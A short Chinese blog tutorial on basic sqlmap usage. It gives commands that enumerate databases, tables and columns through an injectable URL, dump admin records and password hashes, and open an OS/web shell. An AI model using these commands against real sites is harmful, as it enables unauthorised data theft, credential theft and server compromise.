欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

sqlmap简单用法

程序员文章站 2022-03-06 15:36:51
1.查看数据库:python sqlmap -u 存在注入的URL地址 --dbs 以下是结果: 发现2个库。 2.接下来查看表名: 用法:python sqlmap -u...
sqlmap简单用法
1.查看数据库:python sqlmap -u 存在注入的URL地址 --dbs

以下是结果:

sqlmap简单用法

发现2个库。

2.接下来查看表名:

sqlmap简单用法

用法:python sqlmap -u 存在注入的URL地址 -D 数据库名(如图的xkb) --tables

sqlmap简单用法

3.查看字段:

sqlmap简单用法

 

图中是查看数据库xkb中cms_admin表中字段。结果如下:

 

sqlmap简单用法

4.爆字段内容

sqlmap简单用法

 

爆admin_name的内容。

sqlmap简单用法

 

5.脱裤


sqlmap简单用法

-C 字段,字段之间逗号分开。--threads线程数   start,stop就是要脱好多条记录。

最后结果会以CSV格式保存。

 

一些常用命令:

python sqlmap.py -u 注入地址 --is-dba   判断当前用户是不是DBA

python sqlmap.py -u 注入地址 --users    查看当前用户

python sqlmap.py -u 注入地址 --passwords 查看密码

python sqlmap.py -u 注入地址 --privileges 查看权限

python sqlmap.py -u 注入地址 --os-shell  写web shell